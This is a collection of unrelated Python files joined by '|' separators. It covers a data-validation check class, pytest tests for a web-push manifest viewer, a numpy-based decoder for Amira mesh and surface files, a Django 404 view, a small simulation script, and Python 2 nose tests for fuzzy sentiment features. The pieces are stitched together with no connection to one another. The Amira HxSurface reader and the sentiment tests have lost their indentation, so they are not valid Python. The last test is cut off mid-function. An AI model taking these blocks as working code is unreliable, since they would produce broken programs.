        # Fix: define the backing attribute eagerly so that `check.resource`
        # returns None (as the documented `Resource?` contract implies)
        # instead of raising AttributeError before `connect` is called.
        self.__resource = None

    @property
    def resource(self):
        """
        Returns:
            Resource?: resource object available after the `check.connect` call
        """
        return self.__resource

    def connect(self, resource):
        """Connect to the given resource

        Parameters:
            resource (Resource): data resource
        """
        self.__resource = resource

    # Validate

    def validate_start(self):
        """Called to validate the resource after opening

        Yields:
            Error: found errors
        """
        yield from []

    def validate_row(self, row):
        """Called to validate the given row (on every row)

        Parameters:
            row (Row): table row

        Yields:
            Error: found errors
        """
        # Delegate to the wrapped callable (if one was supplied via
        # `function=`); otherwise yield nothing.
        yield from self.__function(row) if self.__function else []

    def validate_end(self):
        """Called to validate the resource before closing

        Yields:
            Error: found errors
        """
        yield from []

    # Metadata

    metadata_Error = errors.CheckError
|
import tempfile
import pytest
from unittest import mock
from blaze.chrome.har import har_from_json
from blaze.command.manifest import view_manifest
from blaze.config.environment import EnvironmentConfig
from blaze.preprocess.har import har_entries_to_resources
from blaze.preprocess.resource import resource_list_to_push_groups
from blaze.preprocess.url import Url
from tests.mocks.har import get_har_json
class TestViewManifest:
    """Tests for the `view_manifest` CLI command."""

    def test_view_manifest_exits_with_missing_arguments(self):
        # With no arguments, argument parsing should abort with SystemExit.
        with pytest.raises(SystemExit):
            view_manifest([])

    def test_view_manifest(self):
        resources = har_entries_to_resources(har_from_json(get_har_json()))
        groups = resource_list_to_push_groups(resources)
        env_config = EnvironmentConfig(
            replay_dir="", request_url="https://www.reddit.com/", push_groups=groups, har_resources=resources
        )
        with mock.patch("builtins.print") as mock_print, tempfile.NamedTemporaryFile() as config_file:
            env_config.save_file(config_file.name)
            view_manifest([config_file.name])
        assert mock_print.call_count > 5
        output = "\n".join(call[0][0] for call in mock_print.call_args_list if call[0])
        # The printed manifest must include the config basics and every group.
        assert env_config.replay_dir in output
        assert env_config.request_url in output
        assert all(group.name in output for group in env_config.push_groups)
        assert all(
            Url.parse(res.url).resource[:61] in output for group in env_config.push_groups for res in group.resources
        )

    def test_view_manifest_only_trainable(self):
        har_json = get_har_json()
        resources = har_entries_to_resources(har_from_json(har_json))
        groups = resource_list_to_push_groups(resources, train_domain_globs=["*reddit.com"])
        env_config = EnvironmentConfig(
            replay_dir="", request_url="https://www.reddit.com/", push_groups=groups, har_resources=resources
        )
        with mock.patch("builtins.print") as mock_print, tempfile.NamedTemporaryFile() as config_file:
            env_config.save_file(config_file.name)
            view_manifest(["--trainable", config_file.name])
        assert mock_print.call_count > 5
        output = "\n".join(call[0][0] for call in mock_print.call_args_list if call[0])
        assert env_config.replay_dir in output
        assert env_config.request_url in output
        # Only trainable groups may appear before the execution-graph section.
        assert all(group.name in output for group in env_config.push_groups if group.trainable)
        pre_graph_output = output.split("Execution Graph")[0]
        assert not any(group.name in pre_graph_output for group in env_config.push_groups if not group.trainable)
|
# -*- coding: utf-8 -*-
"""
data_stream
===========
Classes that define data streams (DataList) in Amira (R) files
There are two main types of data streams:
* `AmiraMeshDataStream` is for `AmiraMesh` files
* `AmiraHxSurfaceDataStream` is for `HxSurface` files
Both classes inherit from `AmiraDataStream` class, which handles common functionality such as:
* initialisation with the header metadata
* the `get_data` method calls each subclass's `_decode` method
"""
from __future__ import print_function
import re
import sys
# todo: remove as soon as DataStreams class is removed
import warnings
import zlib
import numpy as np
from .core import _dict_iter_keys, _dict_iter_values, ListBlock, deprecated
from .grammar import _hyper_surface_file
# definition of numpy data types with dedicated endianess and number of bits
# they are used by the below lookup table
_np_ubytebig = np.dtype(np.uint8).newbyteorder('>')
_np_ubytelittle = np.dtype(np.uint8).newbyteorder('<')
_np_bytebig = np.dtype(np.int8).newbyteorder('>')
_np_bytelittle = np.dtype(np.int8).newbyteorder('<')
_np_shortlittle = np.dtype(np.int16).newbyteorder('<')
_np_shortbig = np.dtype(np.int16).newbyteorder('>')
_np_ushortlittle = np.dtype(np.uint16).newbyteorder('<')
_np_ushortbig = np.dtype(np.uint16).newbyteorder('>')
_np_intlittle = np.dtype(np.int32).newbyteorder('<')
_np_intbig = np.dtype(np.int32).newbyteorder('>')
_np_uintlittle = np.dtype(np.uint32).newbyteorder('<')
_np_uintbig = np.dtype(np.uint32).newbyteorder('>')
_np_longlittle = np.dtype(np.int64).newbyteorder('<')
_np_longbig = np.dtype(np.int64).newbyteorder('>')
_np_ulonglittle = np.dtype(np.uint64).newbyteorder('<')
_np_ulongbig = np.dtype(np.uint64).newbyteorder('>')
_np_floatbig = np.dtype(np.float32).newbyteorder('>')
_np_floatlittle = np.dtype(np.float32).newbyteorder('<')
_np_doublebig = np.dtype(np.float64).newbyteorder('>')
_np_doublelittle = np.dtype(np.float64).newbyteorder('<')
_np_complexbig = np.dtype(np.complex64).newbyteorder('>')
_np_complexlittle = np.dtype(np.complex64).newbyteorder('<')
_np_char = np.dtype(np.string_)
"""
lookuptable of the different data types occurring within
AmiraMesh and HyperSurface files grouped by their endianess
which is defined according to Amira Referenceguide [1] as follows
* BINARY: for bigendian encoded streams,
* BINARY-LITTLE-ENDIAN: for little endian encoded streams and
* ASCII: for human readable encoded data
The lookup table is split into three sections:
* True: for all littleendian data types
* False: for all bigendian data types and
* the direct section mapping to the default numpy types for
reading ASCII encoded data which have no specific endianness besides the
bigendian characteristic intrinsic to decimal numbers.
[1] pp 519-525 # downloaded Dezember 2018 from
http://www1.udel.edu/ctcr/sites/udel.edu.ctcr/files/Amira%20Reference%20Guide.pdf
"""
# Lookup table from Amira type names to numpy dtypes, keyed three ways:
#   _type_map[True]   -> little-endian dtypes (format BINARY-LITTLE-ENDIAN)
#   _type_map[False]  -> big-endian dtypes (format BINARY)
#   _type_map[<name>] -> native dtypes used when decoding ASCII streams
_type_map = {
    True: {
        'byte': _np_ubytelittle,  # NOTE(review): unsigned here, but the ASCII section below maps 'byte' to signed int8 — confirm intended
        'ubyte': _np_ubytelittle,
        'short': _np_shortlittle,
        'ushort': _np_ushortlittle,
        'int': _np_intlittle,
        'uint': _np_uintlittle,
        'long': _np_longlittle,
        'ulong': _np_ulonglittle,
        'uint64': _np_ulonglittle,
        'float': _np_floatlittle,
        'double': _np_doublelittle,
        'complex': _np_complexlittle,
        'char': _np_char,
        'string': _np_char,
        'ascii': _np_char
    },
    False: {
        'byte': _np_ubytebig,  # NOTE(review): unsigned here, see note above
        'ubyte': _np_ubytebig,
        'short': _np_shortbig,
        'ushort': _np_ushortbig,
        'int': _np_intbig,
        'uint': _np_uintbig,
        'long': _np_longbig,
        'ulong': _np_ulongbig,
        'uint64': _np_ulongbig,
        'float': _np_floatbig,
        'double': _np_doublebig,
        'complex': _np_complexbig,
        'char': _np_char,
        'string': _np_char,
        'ascii': _np_char
    },
    # Endianness-free (native) dtypes for ASCII-encoded streams.
    'byte': np.dtype(np.int8),
    'ubyte': np.dtype(np.uint8),
    'short': np.dtype(np.int16),
    'ushort': np.dtype(np.uint16),
    'int': np.dtype(np.int32),
    'uint': np.dtype(np.uint32),
    'long': np.dtype(np.int64),
    'ulong': np.dtype(np.uint64),
    'uint64': np.dtype(np.uint64),
    'float': np.dtype(np.float32),
    'double': np.dtype(np.float64),
    'complex': np.dtype(np.complex64),
    'char': _np_char,
    'string': _np_char,
    'ascii': _np_char
}
# Prefer the fast native (C-extension) byterle decoder; fall back to the pure
# Python implementation below if the extension is not importable.
try:
    if sys.version_info[0] > 2:
        from ahds.decoders import byterle_decoder
    else:
        from .decoders import byterle_decoder
except ImportError:
    def byterle_decoder(data, output_size):
        """If the C-ext. failed to compile or is unimportable use this slower Python equivalent

        Stream format (as implemented below): a control byte with the high bit
        set announces a literal run — the next (value & 0x7f) bytes are copied
        through unchanged; a control byte without the high bit announces a
        repeat run — the single next byte is replicated `value` times.

        :param str data: a raw stream of data to be unpacked
        :param int output_size: the number of items when ``data`` is uncompressed
        :return np.array output: an array of ``np.uint8``
        """
        from warnings import warn
        warn("using pure-Python (instead of Python C-extension) implementation of byterle_decoder")

        input_data = np.frombuffer(data, dtype=_np_ubytelittle, count=len(data))
        output = np.zeros(output_size, dtype=np.uint8)
        i = 0  # read cursor into input_data
        count = True  # True -> next byte is a control byte
        repeat = False  # True -> pending run is literal; False -> replicate one byte
        no = None  # run length decoded from the last control byte
        j = 0  # write cursor into output
        while i < len(input_data):
            if count:
                no = input_data[i]
                if no > 127:
                    no &= 0x7f  # strip the high (literal-run marker) bit
                    count = False
                    repeat = True
                    i += 1
                    continue
                else:
                    i += 1
                    count = False
                    repeat = False
                    continue
            elif not count:
                if repeat:
                    # Literal run: copy the next `no` bytes through unchanged.
                    repeat = False
                    count = True
                    output[j:j + no] = input_data[i:i + no]
                    i += no
                    j += no
                    continue
                elif not repeat:
                    # Repeat run: replicate the single byte at `i`, `no` times.
                    output[j:j + no] = input_data[i]
                    i += 1
                    j += no
                    continue
        # NOTE(review): assert is stripped under `python -O`; a truncated
        # stream would then silently yield a partially-filled output.
        assert j == output_size
        return output

# Common alias for whichever byterle_decoder implementation was selected.
hxbyterle_decode = byterle_decoder
def hxzip_decode(data, output_size):
    """Decode HxZip data stream

    :param str data: a raw stream of data to be unpacked
    :param int output_size: the number of items when ``data`` is uncompressed
    :return np.array output: an array of ``np.uint8``
    """
    # HxZip is plain zlib compression; inflate first, then reinterpret the
    # bytes as unsigned 8-bit integers.
    decompressed = zlib.decompress(data)
    return np.frombuffer(decompressed, dtype=_np_ubytelittle, count=output_size)
def set_data_stream(name, header):
    """Factory function used by AmiraHeader to determine the type of data stream present

    :param str name: name of the data stream block
    :param header: header object exposing a ``filetype`` attribute
    :raises ValueError: if the header's filetype is not recognised
    """
    if header.filetype == 'AmiraMesh':
        return AmiraMeshDataStream(name, header)
    elif header.filetype == 'HyperSurface':
        return AmiraHxSurfaceDataStream(name, header)
    # Previously fell through and silently returned None, deferring the
    # failure to some distant attribute access; fail loudly instead.
    raise ValueError("unknown filetype: {}".format(header.filetype))
class AmiraDataStream(ListBlock):
    """Base class for Amira(R) data streams.

    Holds the raw (undecoded) stream bytes and the header whose metadata is
    needed to locate and decode them.
    """

    __slots__ = ('_stream_data', '_header')

    def __init__(self, name, header):
        self._header = header  # contains metadata for extracting streams
        self._stream_data = None  # raw bytes, populated by subclass read()
        super(AmiraDataStream, self).__init__(name)

    @property
    def load_stream(self):
        """Reports whether data streams are loaded or not"""
        return self._header.load_streams

    def get_data(self):
        """Decode and return the stream data in this stream.

        :raises ValueError: if the stream was never read or is empty
        """
        # Explicit check instead of the previous `assert`: asserts are
        # stripped under `python -O`, and `len(None)` raised TypeError rather
        # than the intended ValueError when read() was never called.
        if not self._stream_data:
            raise ValueError('empty stream found')
        return self._decode(self._stream_data)
class AmiraMeshDataStream(AmiraDataStream):
    """Class that defines an AmiraMesh data stream"""

    def read(self):
        """Extract the data streams from the AmiraMesh file"""
        with open(self._header.filename, 'rb') as f:
            # rewind the file pointer to the end of the header
            f.seek(len(self._header))
            start = int(self.data_index)  # this data stream's index
            end = start + 1
            if self._header.data_stream_count == start:  # this is the last stream
                data = f.read()
                # Capture everything between the "@<start>" marker and EOF.
                _regex = ".*?\n@{}\n(?P<stream>.*)\n".format(start).encode('ASCII')
                regex = re.compile(_regex, re.S)
                match = regex.match(data)
                _stream_data = match.group('stream')
                # Drop a single trailing newline byte (10 == ord('\n')) if present.
                self._stream_data = _stream_data[:-1] if _stream_data[-1] == 10 else _stream_data
            else:
                data = f.read()
                # Capture the bytes between "@<start>" and the next "@<end>" marker.
                _regex = ".*?\n@{}\n(?P<stream>.*)\n@{}\n".format(start, end).encode('ASCII')
                regex = re.compile(_regex, re.S)
                match = regex.match(data)
                self._stream_data = match.group('stream')

    def _decode(self, data):
        """Performs data stream decoding by introspecting the header information

        :param bytes data: raw stream bytes captured by :py:meth:`read`
        :return np.ndarray: decoded array reshaped per shape/dimension metadata
        :raises ValueError: for unknown stream or file formats
        """
        # determine the new output shape, taking into account shape and dimension
        if isinstance(self.shape, tuple):
            if self.dimension > 1:
                new_shape = tuple(list(self.shape) + [self.dimension])
            else:
                new_shape = (self.shape, )
        elif isinstance(self.shape, int):
            if self.dimension > 1:
                new_shape = tuple([self.shape, self.dimension])
            else:
                new_shape = (self.shape, )
        # NOTE(review): if `self.shape` is neither tuple nor int, `new_shape`
        # stays unbound and the reshape below raises UnboundLocalError.
        # first we handle binary files
        # NOTE ON HOW LATTICES ARE STORED
        # AmiraMesh files state the dimensions of the lattice as nx, ny, nz
        # The data is stored such that the first value has index (0, 0, 0) then
        # (1, 0, 0), ..., (nx-1, 0, 0), (0, 1, 0), (1, 1, 0), ..., (nx-1, 1, 0)
        # In other words, the first index changes fastest.
        # The last index is thus the stack index
        # (see pg. 720 of https://assets.thermofisher.com/TFS-Assets/MSD/Product-Guides/user-guide-amira-software.pdf
        if self._header.format == 'BINARY':
            # _type_map[endianness] uses endianness = True for endian == 'LITTLE'
            is_little_endian = self._header.endian == 'LITTLE'
            if self.format is None:
                # Uncompressed binary: reinterpret the bytes directly.
                return np.frombuffer(
                    data,
                    dtype=_type_map[is_little_endian][self.type]
                ).reshape(*new_shape)
            elif self.format == 'HxZip':
                # zlib-compressed binary stream.
                return np.frombuffer(
                    zlib.decompress(data),
                    dtype=_type_map[is_little_endian][self.type]
                ).reshape(*new_shape)
            elif self.format == 'HxByteRLE':
                # Run-length-encoded bytes; decoded size is the product of dims.
                size = int(np.prod(np.array(self.shape)))
                return hxbyterle_decode(
                    data,
                    size
                ).reshape(*new_shape)
            else:
                raise ValueError('unknown data stream format: \'{}\''.format(self.format))
        # explicit instead of assumption
        elif self._header.format == 'ASCII':
            # NOTE(review): np.fromstring with `sep` is deprecated in modern
            # numpy; consider np.array(data.split(), dtype=...) — confirm
            # against the numpy version this package targets.
            return np.fromstring(
                data,
                dtype=_type_map[self.type],
                sep="\n \t"
            ).reshape(*new_shape)
        else:
            raise ValueError("unknown file format: {}".format(self._header.format))
class AmiraHxSurfaceDataStream(AmiraDataStream):
"""Class that defines an Amira HxSurface data stream"""
def read(self):
"""Extract the data streams from the HxSurface file"""
with open(self._header.filename, 'rb') as f:
# rewind the file pointer to the end of the header
f.seek(len(self._header))
data = f.read()
# get the vertex count and streams
_vertices_regex = r".*?\n" \
r"Vertices (?P<vertex_count>\d+)\n" \
r"(?P<streams>.*)".encode('ASCII')
vertices_regex = re.compile(_vertices_regex, re.S)
match_vertices = vertices_regex.match(data)
# todo: fix for full.surf and simple.surf
# print(f"streams: {match_vertices.group('streams')}")
vertex_count = int(match_vertices.group('vertex_count'))
# get the patches
# fixme: general case for NBranchingPoints, NVerticesOnCurves, BoundaryCurves being non-zero
stream_regex = r"(?P<vertices>.*?)\n" \
r"NBranchingPoints (?P<branching_point_count>\d+)\n" \
r"NVerticesOnCurves (?P<vertices_on_curves_count>\d+)\n" \
r"BoundaryCurves (?P<boundary_curve_count>\d+)\n" \
r"Patches (?P<patch_count>\d+)\n" \
r"(?P<patches>.*)".encode('ASCII')
match_streams = re.match(stream_regex, match_vertices.group('streams'), re.S)
# instatiate the vertex block
vertices_block = AmiraHxSurfaceDataStream('Vertices', self._header)
# set the data for this stream
vertices_block._stream_data = match_streams.group('vertices')
# length, type and dimension are needed for decoding
vertices_block.add_attr('length', vertex_count)
vertices_block.add_attr('type', 'float')
vertices_block.add_attr('dimension', 3)
vertices_block.add_attr('data', vertices_block.get_data())
vertices_block.add_attr('NBranchingPoints', 0)
vertices_block.add_attr('NVerticesOnCurves', 0)
vertices_block.add_attr('BoundaryCurves', 0)
# instantiate the patches block
patches_block = AmiraHxSurfaceDataStream('Patches', self._header)
patch_count = int(match_streams.group('patch_count'))
patches_block.add_attr('length', patch_count)
# get the triangles and contents of each patch
# fixme: general case for BoundaryID, BranchingPoints being non-zero
# i've not seen an example with loaded fields
# todo: consider compiling regular expressions
# NOTE:
# There is a subtlety with this regex:
# It might be the case that the last part matches bytes that end in '\n[}]\n'
# that are not the end of the stream. The only way to remede this is to include the
# extra brace [{] so that it now matches '\n[}]\n[{]', which is more likely to
# correspond to the end of the patch. However this introduces a problem:
# we will not be able to match the last patch unless we also add [{] to the stream to match.
# This also means that start_from argument will be wrong given that it will have past
# the starting point of the next patch. This is trivial to solve because we simply
# backtrack start_from by 1.
# These are noted in NOTE A and NOTE B below.
_patch_regex = r"[{]\n" \
r"InnerRegion (?P<patch_inner_region>.*?)\n" \
r"OuterRegion (?P<patch_outer_region>.*?)\n" \
r"BoundaryID (?P<patch_boundary_id>\d+)\n" \
r"BranchingPoints (?P<patch_branching_points>\d+)\n" \
r"\s+\n" \
r"Triangles (?P<triangle_count>.*?)\n" \
r"(?P<triangles>.*?)\n" \
r"[}]\n[{]".encode('ASCII')
patch_regex = re.compile(_patch_regex, re.S)
# start from the beginning
start_from = 0
for p_id in range(patch_count):
# NOTE A
match_patch = patch_regex.match(match_streams.group('patches') + b'{', start_from)
patch_block = AmiraHxSurfaceDataStream('Patch', self._header)
patch_block.add_attr('InnerRegion', match_patch.group('patch_inner_region').decode('utf-8'))
patch_block.add_attr('OuterRegion', match_patch.group('patch_outer_region').decode('utf-8'))
patch_block.add_attr('BoundaryID', int(match_patch.group('patch_boundary_id')))
patch_block.add_attr('BranchingPoints', int(match_patch.group('patch_branching_points')))
# let's now add the triangles from the patch
triangles_block = AmiraHxSurfaceDataStream('Triangles', self._header)
# set the raw data stream
triangles_block._stream_data = match_patch.group('triangles')
# decoding needs to have the length, type, and dimension
triangles_block.add_attr('length', int(match_patch.group('triangle_count')))
triangles_block.add_attr('type', 'int')
triangles_block.add_attr('dimension', 3)
# print('debug:', int(match_patch.group('triangle_count')), len(match_patch.group('triangles')))
# print('debug:', match_patch.group('triangles')[:20])
# print('debug:', match_patch.group('triangles')[-20:])
triangles_block.add_attr('data', triangles_block.get_data())
# now we can add the triangles block to the patch...
patch_block.add_attr(triangles_block)
# then we collate the patches
patches_block.append(patch_block)
# the next patch begins where the last patch ended
# NOTE B
start_from = match_patch.end() - 1 # backtrack by 1
# add the patches to the vertices
vertices_block.add_attr(patches_block)
# add the vertices to the data stream
self.add_attr(vertices_block)
    def _decode(self, data):
        """Decode this stream's raw bytes into a numpy array.

        :param bytes data: the raw stream payload, either packed binary or
            whitespace-separated ASCII numbers depending on the header format
        :return: numpy array reshaped to ``(self.length, self.dimension)``;
            falls through and returns ``None`` if the header format is
            neither ``BINARY`` nor ``ASCII``
        """
        is_little_endian = self._header.endian == 'LITTLE'
        if self._header.format == 'BINARY':
            # Binary payload: reinterpret the buffer with an endian-aware dtype
            # taken from the (endianness, type-name) lookup table.
            return np.frombuffer(
                data,
                dtype=_type_map[is_little_endian][self.type]
            ).reshape(self.length, self.dimension)
        elif self._header.format == 'ASCII':
            # ASCII payload: parse whitespace-separated numbers; endianness is
            # irrelevant for text, so the dtype is looked up by name only.
            # NOTE(review): np.fromstring is deprecated in recent numpy even in
            # text (sep=...) mode — consider np.array(data.split(), dtype=...)
            # as a replacement; confirm against the numpy version pinned here.
            return np.fromstring(
                data,
                dtype=_type_map[self.type],
                sep="\n \t"
            ).reshape(self.length, self.dimension)
@deprecated(
    "DataStreams class is obsolete, access data using stream_data and data attributes of corresponding metadata block attributes of AmiraHeader instance")
class DataStreams(object):
    """Deprecated facade collecting the data streams attached to an AmiraHeader.

    Kept only for backward compatibility: it maps stream names to the
    corresponding header attributes and forwards everything else to the
    header itself.
    """
    __slots__ = ("_header", "__stream_data")
    def __init__(self, header):
        # The header owns all actual stream metadata; this class only indexes it.
        self._header = header
        with warnings.catch_warnings():
            # Suppress the deprecation warnings raised by the deprecated
            # accessors used below during construction.
            warnings.simplefilter('ignore')
            if self._header.filetype == "AmiraMesh":
                # AmiraMesh files expose their streams directly as data pointers.
                self.__stream_data = self._header.data_pointers
            else:
                # HyperSurface files: collect whichever stream blocks the
                # header actually defines, skipping absent ones.
                self.__stream_data = dict()
                for _streamblock in _dict_iter_keys(_hyper_surface_file):
                    _streamlist = _streamblock  # self._header._stream_loader.__class__._group_array_map.get(_streamblock,_streamblock).format('List')
                    _streamlist = getattr(self._header, _streamlist, None)
                    if _streamlist is None:
                        continue
                    self.__stream_data[_streamblock] = _streamlist
    def __getattribute__(self, attr):
        # The four legacy accessors were originally attributes; calling them
        # here preserves the old attribute-style API for callers.
        if attr in ("file", "header", "stream_data", "filetype"):
            return super(DataStreams, self).__getattribute__(attr)()
        return super(DataStreams, self).__getattribute__(attr)
    @deprecated("use <AmiraHeader>.filename instead")
    def file(self):
        """Return the filename recorded on the header."""
        return self._header.filename
    @deprecated("use AmiraHeader instance directly")
    def header(self):
        """Return the underlying AmiraHeader instance."""
        return self._header
    @deprecated(
        "access data of individual streams through corresponding attributes and dedicated stream_data and data attributes of meta data blocks")
    def stream_data(self):
        """Return the collected mapping/listing of stream data."""
        return self.__stream_data
    @deprecated("use <AmiraHeader>.filetype attribute instead")
    def filetype(self):
        """Return the header's filetype string (e.g. "AmiraMesh")."""
        return self._header.filetype
    @deprecated
    def __len__(self):
        return len(self.__stream_data)
    @deprecated
    def __iter__(self):
        return iter(_dict_iter_values(self.__stream_data))
    @deprecated
    def __getitem__(self, key):
        return self.__stream_data[key]
    @deprecated
    def __repr__(self):
        return "{} object with {} stream(s): {} ".format(
            self.__class__,
            len(self),
            ", ".join(_dict_iter_keys(self.__stream_data))
        )
|
import traceback
import logging
from django.shortcuts import render
# Create your views here.
def error_404(request):
    """Render the customized 404 page.

    Wire this view up via a ``handler404`` entry when the backend needs
    to serve a custom not-found page.
    """
    context = {}
    return render(request, 'common/404.html', context)
def load_on_startup():
    """Register all application managers at startup.

    Best-effort: any failure is logged (message plus traceback) and
    swallowed so startup is never aborted by manager registration.
    """
    try:
        from apis.components.factories.managers_factory import ManagersFactory
        ManagersFactory.get_instance().register_all_managers()
    except Exception as err:
        logging.info("Path: project/views.py Source: load_on_startup() Error: %s", str(err))
        logging.info(traceback.format_exc())
|
# All ordered pairs (x, y) drawn from `base` — the Cartesian product base × base.
base = [1, 2, 3]
result = [(x, y) for x in base for y in base]
print(result)
|
from world_simulation import WorldEngine, EngineConfig

# A 5x5 world populated with one herbivore and a small, replenishing food supply.
engine = WorldEngine(5, 5)

herbivore_cfg = EngineConfig.ModelsConfig.HerbivoreConfig
food_cfg = EngineConfig.ModelsConfig.FoodConfig

# Herbivore tuning: exactly one individual, moderate health, long lifespan.
herbivore_settings = (
    ('number_min', 1),
    ('number_max', 1),
    ('health_min', 4),
    ('health_max', 6),
    ('age_min', 20),
    ('age_max', 35),
)
# Food tuning: up to two initial items, 2-3 spawned per cycle, fixed age.
food_settings = (
    ('number_min', 0),
    ('number_max', 2),
    ('spawn_number_min', 2),
    ('spawn_number_max', 3),
    ('age_min', 5),
    ('age_max', 5),
    ('health_min', 2),
    ('health_max', 5),
)
for name, value in herbivore_settings:
    setattr(herbivore_cfg, name, value)
for name, value in food_settings:
    setattr(food_cfg, name, value)

EngineConfig.WorldConfig.load_model(herbivore_cfg)
EngineConfig.WorldConfig.load_model(food_cfg)

# Run until no creature remains alive.
engine.run_loop(while_alive=True)
|
from pyfuzzy_toolbox import transformation as trans
from pyfuzzy_toolbox import preprocessing as pre
import pyfuzzy_toolbox.features.count as count_features
import pyfuzzy_toolbox.features.max as max_features
import pyfuzzy_toolbox.features.sum as sum_features
import test_preprocessing as tpre
import nose
print 'Loading test text 1'
bow_sentences_1 = pre.start(tpre.text_1)
bow_sentences_1 = trans.start(bow_sentences_1)
print 'Loading test text 1a'
bow_sentences_1a = pre.start(tpre.text_1a)
bow_sentences_1a = trans.start(bow_sentences_1a)
print 'Loading test text 2a'
bow_sentences_2a = pre.start(tpre.text_2a)
bow_sentences_2a = trans.start(bow_sentences_2a)
""" ----------------------------- SUM FEATURES ----------------------------- """
"""UNIGRAMS"""
def test_sum_of_positive_adjectives_scores():
expected_sum = 0.0855961827957
sum_of_positive_adjectives = sum_features.sum_of_unigrams_scores(bow_sentences_1)
nose.tools.assert_almost_equal(expected_sum, sum_of_positive_adjectives)
def test_sum_of_positive_adverbs_scores():
expected_sum = 0.0
sum_of_positive_adverbs = sum_features.sum_of_unigrams_scores(
bow_sentences_1, unigram=count_features.ADVS)
nose.tools.assert_almost_equal(expected_sum, sum_of_positive_adverbs)
def test_sum_of_positive_verbs_scores():
expected_sum = 0.02447258064516129
sum_of_positive_verbs = sum_features.sum_of_unigrams_scores(
bow_sentences_1, unigram=count_features.VERBS)
nose.tools.assert_almost_equal(expected_sum, sum_of_positive_verbs)
def test_sum_of_negative_adjectives_scores():
expected_sum = -0.06547738317757008
sum_of_negative_adjectives = sum_features.sum_of_unigrams_scores(
bow_sentences_1a, positive=False)
nose.tools.assert_almost_equal(expected_sum, sum_of_negative_adjectives)
def test_sum_of_negative_adverbs_scores():
expected_sum = -0.00891862928349
sum_of_negative_adverbs = sum_features.sum_of_unigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS, positive=False)
nose.tools.assert_almost_equal(expected_sum, sum_of_negative_adverbs)
def test_sum_of_negative_verbs_scores():
expected_sum = 0.0
sum_of_negative_verbs = sum_features.sum_of_unigrams_scores(
bow_sentences_1a, unigram=count_features.VERBS, positive=False)
nose.tools.assert_almost_equal(expected_sum, sum_of_negative_verbs)
def test_sum_ratio_of_positive_adjectives_scores():
expected_sum = 0.0004601945311596716
sum_of_positive_adjectives = sum_features.sum_of_unigrams_scores(
bow_sentences_1, ratio=True)
nose.tools.assert_almost_equal(expected_sum, sum_of_positive_adjectives)
def test_sum_ratio_of_positive_adverbs_scores():
expected_sum = 0.0
sum_of_positive_adverbs = sum_features.sum_of_unigrams_scores(
bow_sentences_1, unigram=count_features.ADVS, ratio=True)
nose.tools.assert_almost_equal(expected_sum, sum_of_positive_adverbs)
def test_sum_ratio_of_positive_verbs_scores():
expected_sum = 0.00013157301422129724
sum_of_positive_verbs = sum_features.sum_of_unigrams_scores(
bow_sentences_1, unigram=count_features.VERBS, ratio=True, positive=True)
nose.tools.assert_almost_equal(expected_sum, sum_of_positive_verbs)
def test_sum_ratio_of_negative_adjectives_scores():
expected_sum = -0.0008910665972944851
sum_of_negative_adjectives = sum_features.sum_of_unigrams_scores(
bow_sentences_1, ratio=True, positive=False)
nose.tools.assert_almost_equal(expected_sum, sum_of_negative_adjectives)
def test_sum_ratio_of_negative_adverbs_scores():
expected_sum = -2.7783891848875693e-05
sum_of_negative_adverbs = sum_features.sum_of_unigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS, ratio=True, positive=False)
nose.tools.assert_almost_equal(expected_sum, sum_of_negative_adverbs)
def test_sum_ratio_of_negative_verbs_scores():
expected_sum = -0.000179220719158
sum_of_negative_verbs = sum_features.sum_of_unigrams_scores(
bow_sentences_1, unigram=count_features.VERBS, ratio=True, positive=False)
nose.tools.assert_almost_equal(expected_sum, sum_of_negative_verbs)
def test_positive_to_negative_ratio_sum_scores_adjectives():
expected_ratio_sum = (0.0855961827957 + (-0.165738387097))
positive_to_negative_ratio = sum_features.positive_to_negative_ratio_sum_unigrams_scores(
bow_sentences_1)
nose.tools.assert_almost_equal(
expected_ratio_sum, positive_to_negative_ratio)
def test_positive_to_negative_ratio_sum_scores_adverbs():
expected_ratio_sum = (0.0105152647975 + (-0.00891862928349))
positive_to_negative_ratio = sum_features.positive_to_negative_ratio_sum_unigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS)
nose.tools.assert_almost_equal(
expected_ratio_sum, positive_to_negative_ratio)
def test_positive_to_negative_ratio_sum_scores_verbs():
expected_ratio_sum = (0.0223977570093 + (0.0))
positive_to_negative_ratio = sum_features.positive_to_negative_ratio_sum_unigrams_scores(
bow_sentences_1a, unigram=count_features.VERBS)
nose.tools.assert_almost_equal(
expected_ratio_sum, positive_to_negative_ratio)
"""BIGRAMS"""
def test_sum_of_positive_adjectives_scores_and_bigrams_with_adjectives():
expected_sum = 0.0855961827957
sum_of_positive_adjectives_and_bigrams_with_adjectives = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1)
nose.tools.assert_almost_equal(
expected_sum, sum_of_positive_adjectives_and_bigrams_with_adjectives)
def test_sum_of_negative_adjectives_scores_and_bigrams_with_adjectives():
expected_sum = -2.2411307476635516
sum_of_negative_adjectives_and_bigrams_with_adjectives = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1a, positive=False)
nose.tools.assert_almost_equal(
expected_sum, sum_of_negative_adjectives_and_bigrams_with_adjectives)
def test_sum_of_positive_adverbs_scores_and_bigrams_with_adverbs():
expected_sum = 0.0
sum_of_positive_adverbs_and_bigrams_with_adverbs = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1, unigram=count_features.ADVS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADVS)
nose.tools.assert_almost_equal(
expected_sum, sum_of_positive_adverbs_and_bigrams_with_adverbs)
def test_sum_of_negative_adverbs_scores_and_bigrams_with_adverbs():
expected_sum = -0.00891862928349
sum_of_negative_adverbs_and_bigrams_with_adverbs = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADVS, positive=False)
nose.tools.assert_almost_equal(
expected_sum, sum_of_negative_adverbs_and_bigrams_with_adverbs)
def test_sum_of_positive_verbs_scores_and_bigrams_with_verbs():
expected_sum = 0.7079659139784946
sum_of_positive_verbs_and_bigrams_with_verbs = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1, unigram=count_features.VERBS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.VERBS)
nose.tools.assert_almost_equal(
expected_sum, sum_of_positive_verbs_and_bigrams_with_verbs)
def test_sum_of_negative_verbs_scores_and_bigrams_with_verbs():
expected_sum = -0.0333350537634
